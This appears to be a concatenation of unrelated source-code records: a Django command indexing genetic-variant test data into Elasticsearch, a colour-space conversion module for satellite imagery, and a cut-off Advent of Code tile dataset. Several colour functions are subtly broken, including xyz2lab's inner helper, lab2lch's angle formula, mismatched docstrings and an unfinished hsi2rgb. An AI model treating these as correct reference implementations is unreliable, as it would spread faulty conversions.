runner.setup(algo, env, sampler_cls=OnPolicyVectorizedSampler)
runner.train(n_epochs=1, batch_size=1000, n_epoch_cycles=n_samples)
# No assertion on return because CMAES is not stable.
env.close()
| StarcoderdataPython |
3231399 | <filename>core/management/commands/import_test_data.py
from django.core.management.base import BaseCommand, CommandError
import pprint
import os
from core.management.commands.create_gui import add_required_data_to_db
import elasticsearch
class Command(BaseCommand):
def handle(self, *args, **options):
add_required_data_to_db()
dir_path = os.path.dirname(os.path.realpath(__file__))
data = {}
with open(os.path.join(dir_path, 'data', 'test_data.csv'), 'r') as fp:
for line in fp:
if line.startswith('#'):
continue
Variant, CHROM, POS, dbSNP_ID, REF, ALT, VariantType, Sample_ID, Sample_GT, ExonicFunc_refGene = line.strip().split(',')
if Variant not in data:
tmp_dict = {
'Variant': Variant,
'CHROM': CHROM,
'POS': POS,
'REF': REF,
'ALT': ALT,
'VariantType': VariantType,
'ExonicFunc_refGene': ExonicFunc_refGene,
'sample': []
}
if dbSNP_ID:
tmp_dict['dbSNP_ID'] = dbSNP_ID
data[Variant] = tmp_dict
sample_dict = {
'Sample_ID': Sample_ID,
'Sample_GT': Sample_GT
}
data[Variant]['sample'].append(sample_dict)
data_array = []
for key, values in data.items():
data_array.append(values)
es = elasticsearch.Elasticsearch(host='172.17.57.17', port=9200)
index_name = "test_data"
type_name = "test_data"
if es.indices.exists(index_name):
es.indices.delete(index_name)
es.indices.create(index_name)
es.cluster.health(wait_for_status="yellow")
body = {
type_name: {
"properties": {
"Variant": {
"type": "keyword"
},
"CHROM": {
"type": "keyword"
},
"POS": {
"type": "integer"
},
"dbSNP_ID": {
"type": "keyword"
},
"REF": {
"type": "keyword"
},
"ALT": {
"type": "keyword"
},
"VariantType": {
"type": "keyword"
},
"ExonicFunc_refGene": {
"type": "keyword"
},
"sample": {
"type": "nested",
"properties": {
"Sample_ID": {
"type": "keyword"
},
"Sample_GT": {
"type": "keyword"
}
}
}
}
}
}
es.indices.put_mapping(index=index_name, doc_type=type_name, body=body)
for body in data_array:
es.index(index=index_name, doc_type=type_name, body=body)
| StarcoderdataPython |
34605 | import numpy as np
from .image_transforms import mat_to_gray
def rgb2hcv(Blue, Green, Red):
"""transform red green blue arrays to a color space
Parameters
----------
Blue : np.array, size=(m,n)
Blue band of satellite image
Green : np.array, size=(m,n)
Green band of satellite image
Red : np.array, size=(m,n)
Red band of satellite image
Returns
-------
V : np.array, size=(m,n)
array with dominant frequency
H : np.array, size=(m,n)
array with amount of color
C : np.array, size=(m,n)
luminance
See also
--------
rgb2yiq, rgb2ycbcr, rgb2hsi, rgb2xyz, rgb2lms
Notes
-----
.. [1] Smith, "Putting colors in order", Dr. Dobb’s Journal, pp 40, 1993.
.. [2] Tsai, "A comparative study on shadow compensation of color aerial
images in invariant color models", IEEE transactions in geoscience and
remote sensing, vol. 44(6) pp. 1661--1671, 2006.
"""
NanBol = Blue == 0
Blue, Green = mat_to_gray(Blue, NanBol), mat_to_gray(Green, NanBol)
Red = Red = mat_to_gray(Red, NanBol)
np.amax( np.dstack((Red, Green)))
V = 0.3*(Red + Green + Blue)
H = np.arctan2( Red-Blue, np.sqrt(3)*(V-Green))
IN = abs(np.cos(H))<= 0.2
C = np.divide(V-Green, np.cos(H))
C2 = np.divide(Red-Blue, np.sqrt(3)*np.sin(H))
C[IN] = C2[IN]
return H, C, V
def rgb2yiq(Red, Green, Blue):
"""transform red, green, blue to luminance, inphase, quadrature values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
Y : np.array, size=(m,n)
luminance
I : np.array, size=(m,n)
inphase
Q : np.array, size=(m,n)
quadrature
See also
--------
yiq2rgb, rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2xyz, rgb2lms
Notes
-----
.. [1] <NAME> "Digital image processing", 1992.
"""
L = np.array([(+0.299, +0.587, +0.114),
(+0.596, -0.275, -0.321),
(+0.212, -0.523, +0.311)])
RGB = np.dstack((Red, Green, Blue))
YIQ = np.einsum('ij,klj->kli', L, RGB)
Y,I,Q = YIQ[:,:,0], YIQ[:,:,1], YIQ[:,:,2]
return Y, I, Q
def yiq2rgb(Y,I,Q):
"""transform luminance, inphase, quadrature values to red, green, blue
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
Y : np.array, size=(m,n)
luminance
I : np.array, size=(m,n)
inphase
Q : np.array, size=(m,n)
quadrature
See also
--------
rgb2yiq
Notes
-----
.. [1] <NAME> "Digital image processing", 1992.
"""
L = np.array([(+0.299, +0.587, +0.114),
(+0.596, -0.275, -0.321),
(+0.212, -0.523, +0.311)])
Linv = np.linalg.inv(L)
YIQ = np.dstack((Y, I, Q))
RGB = np.einsum('ij,klj->kli', Linv, YIQ)
R,G,B = RGB[:,:,0], RGB[:,:,1], RGB[:,:,2]
return R, G, B
def rgb2ycbcr(Red, Green, Blue):
"""transform red, green, blue arrays to luna and chroma values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
Y : np.array, size=(m,n)
luma
Cb : np.array, size=(m,n)
chroma
Cr : np.array, size=(m,n)
chroma
See also
--------
rgb2hcv, rgb2yiq, rgb2hsi, rgb2xyz, rgb2lms
Notes
-----
.. [1] Tsai, "A comparative study on shadow compensation of color aerial
images in invariant color models", IEEE transactions in geoscience and
remote sensing, vol. 44(6) pp. 1661--1671, 2006.
"""
L = np.array([(+0.257, +0.504, +0.098),
(-0.148, -0.291, +0.439),
(+0.439, -0.368, -0.071)])
C = np.array([16, 128, 128])/2**8
RGB = np.dstack((Red, Green, Blue))
YCC = np.einsum('ij,klj->kli', L, RGB)
del RGB
Y = YCC[:,:,0] + C[0]
Cb= YCC[:,:,1] + C[1]
Cr= YCC[:,:,2] + C[2]
return Y, Cb, Cr
def rgb2hsi(Red, Green, Blue):
"""transform red, green, blue arrays to hue, saturation, intensity arrays
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
Hue : np.array, size=(m,n), range=0...1
Hue
Sat : np.array, size=(m,n), range=0...1
Saturation
Int : np.array, size=(m,n), range=0...1
Intensity
See also
--------
erdas2hsi, rgb2hcv, rgb2yiq, rgb2ycbcr, rgb2xyz, rgb2lms
Notes
-----
.. [1] Tsai, "A comparative study on shadow compensation of color aerial
images in invariant color models", IEEE transactions in geoscience and
remote sensing, vol. 44(6) pp. 1661--1671, 2006.
.. [2] Pratt, "Digital image processing" Wiley, 1991.
"""
if np.ptp(Red.flatten())>1:
Red = mat_to_gray(Red)
if np.ptp(Green.flatten())>1:
Green = mat_to_gray(Green)
if np.ptp(Blue.flatten())>1:
Blue = mat_to_gray(Blue)
Tsai = np.array([(1/3, 1/3, 1/3),
(-np.sqrt(6)/6, -np.sqrt(6)/6, -np.sqrt(6)/3),
(1/np.sqrt(6), 2/-np.sqrt(6), 0)])
RGB = np.dstack((Red, Green, Blue))
HSI = np.einsum('ij,klj->kli', Tsai, RGB)
Int = HSI[:,:,0]
Sat = np.sqrt(HSI[:,:,1] ** 2 + HSI[:,:,2] ** 2)
Hue = np.arctan2(HSI[:,:,1], HSI[:,:,2])/np.pi
Hue = np.remainder(Hue, 1) # bring to from -.5...+.5 to 0...1 range
return Hue, Sat, Int
def hsi2rgb(Hue, Sat, Int): #todo
Red,Green,Blue = np.zeros_like(Hue), np.zeros_like(Hue), np.zeros_like(Hue)
Class = np.ceil(Hue/3)
Color = 1 + Sat * np.divide(Hue, np.cos(np.radians(60)))
# red-green space
Sel = Class==1
Blue[Sel] = np.divide(1 - Sat[Sel], 3)
Red[Sel] = np.divide(Int[Sel] + Color[Sel], 3)
Green[Sel] = 1 - (Red[Sel] + Blue[Sel])
# green-blue space
Sel = Class==2
Red[Sel] = np.divide(1 - Sat[Sel], 3)
Green[Sel] = np.divide(Int[Sel] + Color[Sel], 3)
Blue[Sel] = 1 - (Green[Sel] + Red[Sel])
# blue-red space
Sel = Class==3
Green[Sel] = np.divide(1 - Sat[Sel], 3)
Blue[Sel] = np.divide(Int[Sel] + Color[Sel], 3)
Red[Sel] = 1 - (Blue[Sel] + Green[Sel])
return Red, Green, Blue
def erdas2hsi(Blue, Green, Red):
"""transform red, green, blue arrays to hue, saturation, intensity arrays
Parameters
----------
Blue : np.array, size=(m,n)
blue band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Red : np.array, size=(m,n)
red band of satellite image
Returns
-------
Hue : np.array, size=(m,n), float
hue
Sat : np.array, size=(m,n), float
saturation
Int : np.array, size=(m,n), float
intensity
See also
--------
rgb2hsi
Notes
-----
.. [1] ERDAS, "User handbook", 2013.
"""
if np.ptp(Red.flatten())>1:
Red = mat_to_gray(Red)
if np.ptp(Green.flatten())>1:
Green = mat_to_gray(Green)
if np.ptp(Blue.flatten())>1:
Blue = mat_to_gray(Blue)
Stack = np.dstack((Blue, Green, Red))
min_Stack = np.amin(Stack, axis=2)
max_Stack = np.amax(Stack, axis=2)
Int = (max_Stack + min_Stack)/2
Sat = np.copy(Blue)
Sat[Int==0] = 0
Sat[Int<=.5] = (max_Stack[Int<=.5] -
min_Stack[Int<=.5]) / (max_Stack[Int<=.5] +
min_Stack[Int<=.5])
Sat[Int>.5] = (max_Stack[Int>.5] -
min_Stack[Int>.5]) / ( 2 - max_Stack[Int>.5] +
min_Stack[Int>.5])
Hue = np.copy(Blue)
Hue[Blue==max_Stack] = (1/6) *(6
+ Green[Blue==max_Stack]
- Red[Blue==max_Stack])
Hue[Green==max_Stack] = (1/6) *(4
+ Red[Green==max_Stack]
- Blue[Green==max_Stack])
Hue[Red==max_Stack] = (1/6) *(2
+ Blue[Red==max_Stack]
- Green[Red==max_Stack])
return Hue, Sat, Int
def rgb2xyz(Red, Green, Blue, method='reinhardt'):
"""transform red, green, blue arrays to XYZ tristimulus values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
method :
'reinhardt'
XYZitu601-1 axis
'ford'
D65 illuminant
Returns
-------
X : np.array, size=(m,n)
Y : np.array, size=(m,n)
Z : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2lms, xyz2lms
Notes
-----
.. [1] <NAME> al. "Color transfer between images" IEEE Computer graphics
and applications vol.21(5) pp.34-41, 2001.
.. [2] <NAME>. "Color space conversion", pp. 1--31, 1998.
"""
if method=='ford':
M = np.array([(0.4124564, 0.3575761, 0.1804375),
(0.2126729, 0.7151522, 0.0721750),
(0.0193339, 0.1191920, 0.9503041)])
else:
M = np.array([(0.5141, 0.3239, 0.1604),
(0.2651, 0.6702, 0.0641),
(0.0241, 0.1228, 0.8444)])
RGB = np.dstack((Red, Green, Blue))
XYZ = np.einsum('ij,klj->kli', M, RGB)
X,Y,Z = XYZ[:,:,0], XYZ[:,:,1], XYZ[:,:,2]
return X, Y, Z
def xyz2lms(X, Y, Z):
"""transform XYZ tristimulus arrays to LMS values
Parameters
----------
X : np.array, size=(m,n)
modified XYZitu601-1 axis
Y : np.array, size=(m,n)
modified XYZitu601-1 axis
Z : np.array, size=(m,n)
modified XYZitu601-1 axis
Returns
-------
L : np.array, size=(m,n)
M : np.array, size=(m,n)
S : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2lms
Notes
-----
.. [1] <NAME> al. "Color transfer between images" IEEE Computer graphics
and applications vol.21(5) pp.34-41, 2001.
"""
N = np.array([(+0.3897, +0.6890, -0.0787),
(-0.2298, +1.1834, +0.0464),
(+0.0000, +0.0000, +0.0000)])
RGB = np.dstack((X, Y, Z))
LMS = np.einsum('ij,klj->kli', N, RGB)
L,M,S = LMS[:,:,0], LMS[:,:,1], LMS[:,:,2]
return L, M, S
def xyz2lab(X, Y, Z, th=0.008856):
"""transform XYZ tristimulus arrays to Lab values
Parameters
----------
X : np.array, size=(m,n)
Y : np.array, size=(m,n)
Z : np.array, size=(m,n)
Returns
-------
L : np.array, size=(m,n)
a : np.array, size=(m,n)
b : np.array, size=(m,n)
See also
--------
rgb2xyz, xyz2lms, lms2lch
Notes
-----
.. [1] Ford & Roberts. "Color space conversion", pp. 1--31, 1998.
.. [2] Silva et al. "Near real-time shadow detection and removal in aerial
motion imagery application" ISPRS journal of photogrammetry and remote
sensing, vol.140 pp.104--121, 2018.
"""
Xn,Yn,Zn = 95.047, 100.00, 108.883 # D65 illuminant
YYn = Y/Yn
L_1 = 116* YYn**(1/3.)
L_2 = 903.3 * YYn
L = L_1
L[YYn<=th] = L_2[YYn<=th]
def f(tau, th):
fx = X**(1/3.)
fx[X<=th] = 7.787*X[X<th] + 16/116
return fx
a = 500*( f(X/Xn, th) - f(Z/Zn, th) )
b = 200*( f(Y/Yn, th) - f(Z/Zn, th) )
return L, a, b
def lab2lch(L, a, b):
"""transform XYZ tristimulus arrays to Lab values
Parameters
----------
L : np.array, size=(m,n)
a : np.array, size=(m,n)
b : np.array, size=(m,n)
Returns
-------
C : np.array, size=(m,n)
h : np.array, size=(m,n)
See also
--------
rgb2xyz, xyz2lms, xyz2lab
Notes
-----
.. [1] Ford & Roberts. "Color space conversion", pp. 1--31, 1998.
.. [2] Silva et al. "Near real-time shadow detection and removal in aerial
motion imagery application" ISPRS journal of photogrammetry and remote
sensing, vol.140 pp.104--121, 2018.
"""
C = np.sqrt( a**2 + b**2)
# calculate angle, and let it range from 0...1
h = ((np.arctan2(b, a) + 2*np.pi)% 2*np.pi) / 2*np.pi
return C, h
def rgb2lms(Red, Green, Blue):
"""transform red, green, blue arrays to XYZ tristimulus values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
L : np.array, size=(m,n)
M : np.array, size=(m,n)
S : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2xyz, xyz2lms
Notes
-----
.. [1] Reinhard et al. "Color transfer between images", 2001.
"""
I = np.array([(0.3811, 0.5783, 0.0402),
(0.1967, 0.7244, 0.0782),
(0.0241, 0.1228, 0.8444)])
RGB = np.dstack((Red, Green, Blue))
LMS = np.einsum('ij,klj->kli', I, RGB)
L,M,S = LMS[:,:,0], LMS[:,:,1], LMS[:,:,2]
return L, M, S
def lms2lab(L, M, S):
"""transform L, M, S arrays to lab color space
Parameters
----------
L : np.array, size=(m,n)
M : np.array, size=(m,n)
S : np.array, size=(m,n)
Returns
-------
l : np.array, size=(m,n)
a : np.array, size=(m,n)
b : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2xyz, xyz2lms
Notes
-----
.. [1] Reinhard et al. "Color transfer between images", 2001.
"""
I = np.matmul(np.array([(1/np.sqrt(3), 0, 0),
(0, 1/np.sqrt(6), 0),
(0, 0, 1/np.sqrt(2))]),
np.array([(+1, +1, +1),
(+1, +1, -2),
(+1, -1, +0)]))
LMS = np.dstack((L, M, S))
lab = np.einsum('ij,klj->kli', I, LMS)
l,a,b = lab[:,:,0], lab[:,:,1], lab[:,:,2]
return l, a, b
| StarcoderdataPython |
1638948 | #sed 's/^/"/ ; s/$/",/ ; s/Tile // ; s/:",/":[/ ; s/"",/],/ ; s/\./0/g ; s/#/1/g ' < advent-20.raw > advent-20.py
m={
"1217":[
"0100001001",
"1010000111",
"1101000010",
"1100011100",
"1110010010",
"0100011000",
"1010011000",
"1000101100",
"1001100001",
"0110100100",
],
"2357":[
"0000010101",
"1000010001",
"0000000100",
"0010000011",
"0000000000",
"1010100011",
"1010000111",
"0001000010",
"1011000000",
"1001111111",
],
"1399":[
"0110111111",
"1100000001",
"1011000100",
"0000001001",
"0000001000",
"0100000000",
"0000101000",
"0000101000",
"1100010110",
"1111011111",
],
"3733":[
"1001010101",
"1000111001",
"1001011110",
"0001000000",
"1000001001",
"0001010000",
"1100001001",
"1100010000",
"0100001000",
"1010001001",
],
"2503":[
"1001001111",
"0000001011",
"1000100011",
"0000000000",
"0101110101",
"0000000100",
"0000010001",
"1000001101",
"1000000000",
"1001011010",
],
"1511":[
"1010110110",
"1111100101",
"0100000000",
"1110010100",
"1001011011",
"0100001011",
"1000010000",
"1000011000",
"0000000001",
"1001100011",
],
"3583":[
"1101100101",
"0010111100",
"1000000111",
"1010011011",
"1000000011",
"1010010100",
"0101110010",
"0100000100",
"1000000101",
"1011000001",
],
"1637":[
"1011100101",
"1001000001",
"0000010001",
"0000100001",
"0001000010",
"0000100001",
"0000010100",
"1011000001",
"1001000100",
"1100101111",
],
"1453":[
"0110100110",
"0000000000",
"1110100101",
"1000111000",
"0011110001",
"1010000000",
"1000100001",
"1001001100",
"1000000001",
"0000001110",
],
"1153":[
"1000100110",
"1000000001",
"0010100010",
"0100001110",
"1010110001",
"1000010011",
"1100000011",
"0010000000",
"1010000001",
"1001101100",
],
"3701":[
"0011101010",
"0001100001",
"1001100001",
"1000000000",
"1101110001",
"1001111011",
"0000110000",
"1010100001",
"0000000000",
"0111110000",
],
"2179":[
"0101000011",
"0010011011",
"1100100110",
"1110100000",
"0010011000",
"1000100011",
"0000001001",
"1100010010",
"0010101100",
"1011100001",
],
"1999":[
"0100010111",
"0000000000",
"1000000100",
"0100000010",
"0101100000",
"1110001000",
"0000000110",
"1000000000",
"0011000001",
"1001101101",
],
"2333":[
"0101000010",
"0010000000",
"1001000100",
"0000000100",
"0000100010",
"0001011010",
"0100000000",
"1010000101",
"1100000000",
"1001101000",
],
"1733":[
"0111100101",
"0100101001",
"1001100001",
"1110011101",
"0111010111",
"1010110001",
"0000100001",
"1000010100",
"0000100101",
"0000010000",
],
"3217":[
"1111101101",
"1000000101",
"0000000001",
"1010000011",
"1100000010",
"1001010001",
"0110000000",
"1001000001",
"1010100100",
"0001010001",
],
"1471":[
"0001000001",
"1000100010",
"1101000010",
"1011000011",
"1010110000",
"0011100011",
"1010001100",
"0100100011",
"1011000011",
"0010010011",
],
"2089":[
"1110110000",
"0011000111",
"0000000010",
"1000000001",
"0001011011",
"0000001100",
"1110001000",
"1000000001",
"0010000000",
"0000010110",
],
"2909":[
"0000011110",
"0100100111",
"0110010110",
"0000000010",
"1000010000",
"1101011100",
"0110010011",
"0000000100",
"1000000000",
"1000011111",
],
"3433":[
"1010010000",
"1000000001",
"1010101010",
"0111011000",
"1000010101",
"0100001011",
"0100001100",
"0100000001",
"1000001000",
"0111000010",
],
"3049":[
"0001000000",
"1000110011",
"1100000101",
"1010000101",
"0001000011",
"0000001001",
"1000000011",
"0000110001",
"0101011000",
"0111111000",
],
"2143":[
"0111111000",
"0110100111",
"1101100101",
"0100001000",
"0101100010",
"1000100001",
"1100010000",
"1100110100",
"1000011000",
"1101000101",
],
"3299":[
"1001101100",
"0000000000",
"1001010000",
"0000000110",
"0000000000",
"0010001100",
"0100001000",
"1001100001",
"1000100001",
"0101011111",
],
"2803":[
"0010000111",
"0010110100",
"0000001110",
"0000010000",
"1001101000",
"0110001001",
"1000010000",
"0001000000",
"0000001011",
"0011100101",
],
"2311":[
"1001100001",
"0000010000",
"0100110011",
"1001110000",
"1001001010",
"0000000000",
"0010000101",
"1001101011",
"0111010100",
"0011011010",
],
"1123":[
"1011110001",
"0000001111",
"0010010001",
"0010100111",
"1110001001",
"0101000001",
"0000010110",
"1010100101",
"0000000011",
"0001100111",
],
"1777":[
"0011111110",
"1100000000",
"0001001011",
"0000000011",
"1100000011",
"1100001101",
"1000000100",
"0100010010",
"1001011110",
"0011100010",
],
"1321":[
"0111000110",
"1000000010",
"1110000100",
"0100110100",
"1010011011",
"1110100111",
"1000010001",
"1010101111",
"0000000001",
"0110000001",
],
"2287":[
"0000010010",
"0100111111",
"0010100000",
"1000000001",
"1001010011",
"0100001010",
"1010100001",
"0000100000",
"0010000011",
"0101010101",
],
"3727":[
"0101010011",
"1101001010",
"1100000011",
"1100001101",
"0000010011",
"1000100001",
"0100001000",
"0000101110",
"0010000001",
"0111101101",
],
"1607":[
"0000000101",
"1000001000",
"1000001010",
"0100101101",
"1010100000",
"1000001001",
"0000011001",
"0000011101",
"0000100000",
"1001001111",
],
"1327":[
"0110001010",
"1110001000",
"1100000001",
"0000000111",
"1010000001",
"1001000001",
"0000010101",
"1000000001",
"1010010100",
"1010011011",
],
"3889":[
"0101010010",
"0011000101",
"1000100011",
"1000101011",
"1010000000",
"1110000001",
"0000000011",
"1001000010",
"0000010001",
"1111000100",
],
"1447":[
"0011101101",
"0001010000",
"0110000001",
"0000011000",
"0000001000",
"1001010101",
"1010101101",
"1001000101",
"1110011000",
"1011010001",
],
"3767":[
"0100001000",
"0000000000",
"1100000000",
"0100000001",
"0000010100",
"0100000100",
"1000000101",
"1000001011",
"0000011101",
"0001011110",
],
"2957":[
"1101000011",
"1010000010",
"0100001000",
"1000010101",
"0000001000",
"1011001000",
"0000000001",
"0010110011",
"1110000000",
"0100010000",
],
"3911":[
"0010110110",
"1000100010",
"0101011111",
"1011100101",
"1001000100",
"1110010100",
"0001010000",
"1011000110",
"0000100000",
"1000101101",
],
"2683":[
"1011111010",
"1001001100",
"0000001111",
"1001100100",
"1011010001",
"1000000001",
"1110001001",
"1001000000",
"1011100001",
"0110101010",
],
"2267":[
"1010010100",
"0001010010",
"1001100100",
"1101000101",
"0010000001",
"1100001000",
"1000000000",
"1001100000",
"0001001000",
"1100111011",
],
"1709":[
"1001000100",
"0101100101",
"1000111001",
"1101101001",
"1101000000",
"1001001001",
"0011000100",
"1000011001",
"1000001111",
"1111111000",
],
"2347":[
"1101100001",
"1000000001",
"0000101000",
"0010110111",
"1100001101",
"0001010100",
"1001000000",
"0100000001",
"0000100000",
"0111011010",
],
"1051":[
"1110100011",
"1010000000",
"1000000011",
"0000000000",
"1110011100",
"0011100100",
"1001000100",
"0010000000",
"0000110010",
"0101011011",
],
"2903":[
"0001100000",
"1001010000",
"0001000000",
"1000100101",
"1001000000",
"1000100011",
"1100000000",
"1010000000",
"1000001100",
"0001111101",
],
"1619":[
"1001110101",
"1010000001",
"1000000011",
"0000001001",
"0110000001",
"1000001001",
"1011000101",
"1001100001",
"0100001010",
"0111101110",
],
"3203":[
"0001011010",
"1011100000",
"0100100101",
"1010011000",
"0000010101",
"0000000000",
"0110010001",
"0000011010",
"0000000001",
"0111110110",
],
"2269":[
"0110100010",
"1000011010",
"1011010110",
"1000001001",
"0000000000",
"1100000011",
"0000011010",
"1000000000",
"0000100000",
"0000011010",
],
"2027":[
"1001111111",
"1000110001",
"0001001011",
"1000100000",
"1000010000",
"1100010011",
"1000101001",
"1110011100",
"1010011111",
"1001001010",
],
"1973":[
"1101011001",
"0101010001",
"1000100001",
"1000000100",
"1000001100",
"0001000011",
"0100000100",
"1011000001",
"0000000011",
"0110100000",
],
"3559":[
"0111111011",
"0000000100",
"0011000011",
"1010101101",
"1001010101",
"0010101000",
"0101001001",
"1000101000",
"0101001001",
"1100001111",
],
"3319":[
"1000100000",
"0100110100",
"1101000001",
"0000000000",
"0011110000",
"0110010000",
"0001100000",
"1001000100",
"1110010000",
"1010011111",
],
"3631":[
"1100001001",
"0100111101",
"1101000101",
"1000010010",
"0000000000",
"0011000001",
"1001000101",
"0000000101",
"1011001010",
"0000011110",
],
"2377":[
"0000010001",
"1000010000",
"0010100000",
"0000010010",
"0000000011",
"1110000011",
"1000000000",
"0000100011",
"0000000001",
"0110101010",
],
"3331":[
"1001001010",
"1100000001",
"0000110000",
"0001110101",
"0111011010",
"1110000001",
"1010110000",
"1010001000",
"0001000001",
"0011111101",
],
"2473":[
"1011100001",
"1000101010",
"1000110001",
"0100100110",
"0000000010",
"0101010001",
"1010100101",
"0110000000",
"0100000001",
"1101001110",
],
"1039":[
"1100101101",
"1000000100",
"1110000101",
"0010010000",
"0110000000",
"1111011001",
"1100100100",
"0000010000",
"1100001010",
"1000001101",
],
"2111":[
"0100100010",
"1011010000",
"0111100101",
"1001010101",
"0010001000",
"0010101000",
"0000001010",
"1000001001",
"0011001001",
"1111000011",
],
"2039":[
"1011110111",
"0010101100",
"0010010000",
"1110000000",
"1010000001",
"0000000001",
"0100000001",
"1010001010",
"1111000001",
"1111110100",
],
"3391":[
"0111101010",
"1010001101",
"0101000001",
"0001100010",
"0100100100",
"0010011000",
"0000010100",
"1000010000",
"0100100100",
"1101100111",
],
"1913":[
"0101111111",
"1010010011",
"0110100000",
"1010000001",
"0000110000",
"1110010000",
"0000000011",
"1000001100",
"0100110001",
"1100001000",
],
"2693":[
"1001101001",
"0100001011",
"0100011001",
"0001100000",
"1110010011",
"1100100001",
"0001000001",
"1100000000",
"1111000110",
"1000101011",
],
"1033":[
"1111101000",
"1000000001",
"1010001010",
"0111000000",
"0011000010",
"1000111101",
"0000100101",
"0000011000",
"0000010011",
"1100110100",
],
"2273":[
"1011000011",
"0000000000",
"1001100010",
"1110000000",
"0010101011",
"1100000001",
"1100110010",
"0000000000",
"0000000001",
"0110011011",
],
"1049":[
"1110110000",
"1111000010",
"0001010000",
"0000110001",
"1000100001",
"1100011100",
"1100100000",
"1111000000",
"1100110001",
"0000011001",
],
"1787":[
"0101011011",
"1110100001",
"1000111010",
"0010000100",
"0000000001",
"0000101000",
"0110000010",
"0000011101",
"0111001000",
"0110111100",
],
"2689":[
"0000000111",
"0010010000",
"1000000101",
"1010110001",
"1010101000",
"0110000000",
"0010010100",
"0001100001",
"1000000101",
"0101111110",
],
"1933":[
"1111110100",
"0010100010",
"0001000101",
"1110100001",
"0010000010",
"1001111000",
"1100000000",
"0011100001",
"0000100000",
"1111101111",
],
"1823":[
"1110100101",
"0000000000",
"0101000100",
"0010011010",
"0100100110",
"1010100001",
"0100100001",
"0000000011",
"1110101000",
"1000000010",
],
"1439":[
"0100000101",
"0001010001",
"0001010000",
"0001100100",
"1000100100",
"0001010001",
"0100100001",
"1000111001",
"1001111100",
"1010100011",
],
"1657":[
"0111101101",
"1000010000",
"0100100000",
"0011001000",
"1100100001",
"0100000010",
"1011100010",
"0000000001",
"1011110000",
"1100001101",
],
"3517":[
"1101011010",
"1001000011",
"1100000011",
"1000100100",
"0110011000",
"0000000010",
"0010001101",
"1010010000",
"1100001101",
"1111001000",
],
"3943":[
"0101001101",
"1000000001",
"1001000000",
"1000000011",
"1100100000",
"1111000101",
"0111000010",
"1110000000",
"0110000000",
"0010001111",
],
"2801":[
"1101101110",
"1101110100",
"1101000000",
"0011100000",
"1101001000",
"1000000100",
"1011000001",
"1101010001",
"0000100001",
"0011110010",
],
"2411":[
"1010101000",
"0111101011",
"0000100101",
"0000000011",
"0000100100",
"1000110010",
"1010000001",
"1000001000",
"0100001001",
"0010000010",
],
"3907":[
"1000001001",
"0110010000",
"1100100000",
"0000010000",
"0100101110",
"1000000111",
"0000001000",
"1100000001",
"0000000011",
"1111011010",
],
"2819":[
"0010110101",
"0010010001",
"0001000101",
"0010001000",
"1000011010",
"1011010000",
"0000000001",
"1000100111",
"1110100000",
"0000001100",
],
"3307":[
"0101100110",
"1001000101",
"1010010000",
"1001000010",
"0000100010",
"1010010001",
"0001000001",
"0010001100",
"1010001001",
"1010000011",
],
"3313":[
"1011000110",
"0000000111",
"0000100100",
"1011101101",
"1110101001",
"0000110000",
"0000101101",
"1001011001",
"0010111010",
"1010101011",
],
"3037":[
"0111010000",
"1001001101",
"0001111000",
"1011001000",
"1000100100",
"0001000001",
"0000000010",
"1110110100",
"1011110010",
"1110010110",
],
"2053":[
"1111010000",
"1010011001",
"0100011101",
"1011110000",
"1000000000",
"1000001001",
"1010100000",
"0010100010",
"1001010001",
"0010010110",
],
"3769":[
"0000100110",
"1001000000",
"1000111001",
"1001100001",
"0100000001",
"1000000000",
"0100100110",
"1010100101",
"1010000000",
"1001100100",
],
"1759":[
"0001100001",
"0000000000",
"1110000001",
"1100000000",
"0000010000",
"1001100100",
"0000001010",
"1110011001",
"0100001001",
"0000001010",
],
"1229":[
"1011010100",
"1001000111",
"0001000001",
"0100001001",
"1011001101",
"1001000111",
"0000000000",
"0000011100",
"0010010011",
"1101000011",
],
"3821":[
"0110111101",
"0000001111",
"0000001010",
"1000010111",
"0101100101",
"0000000000",
"0001010001",
"0010001100",
"1101010011",
"1111000111",
],
"1319":[
"1011001011",
"0001001100",
"0010100000",
"0100100001",
"1001010100",
"1000001001",
"1010100000",
"0001110000",
"1101100010",
"0101101100",
],
"3167":[
"1010000011",
"0100011101",
"0100011010",
"1110010001",
"0000110011",
"0000010011",
"0010001011",
"0000000111",
"0000000001",
"1101010111",
],
"3407":[
"0001100101",
"0100011000",
"0000000001",
"1001001010",
"1010000101",
"0001010001",
"0101000000",
"0000100001",
"1001000010",
"0111100110",
],
"1231":[
"1000100111",
"1000000001",
"1100000001",
"1010010000",
"1010100000",
"0100100000",
"1000100000",
"1001000111",
"0010100001",
"1011011100",
],
"3623":[
"1101101100",
"1001000001",
"0000000010",
"1000000001",
"0000100000",
"0000000100",
"0000011001",
"1110001110",
"0011001001",
"0100111101",
],
"3541":[
"1000000010",
"1100000000",
"0111100010",
"0100100100",
"1000001001",
"0010001100",
"1001000110",
"1000011001",
"0000100010",
"0100111110",
],
"2939":[
"0010111001",
"0000001100",
"1000101000",
"1000000000",
"1000101000",
"1000010000",
"1100000100",
"0000000100",
"1110011111",
"0101110011",
],
"1847":[
"0111110110",
"0000101101",
"0001000000",
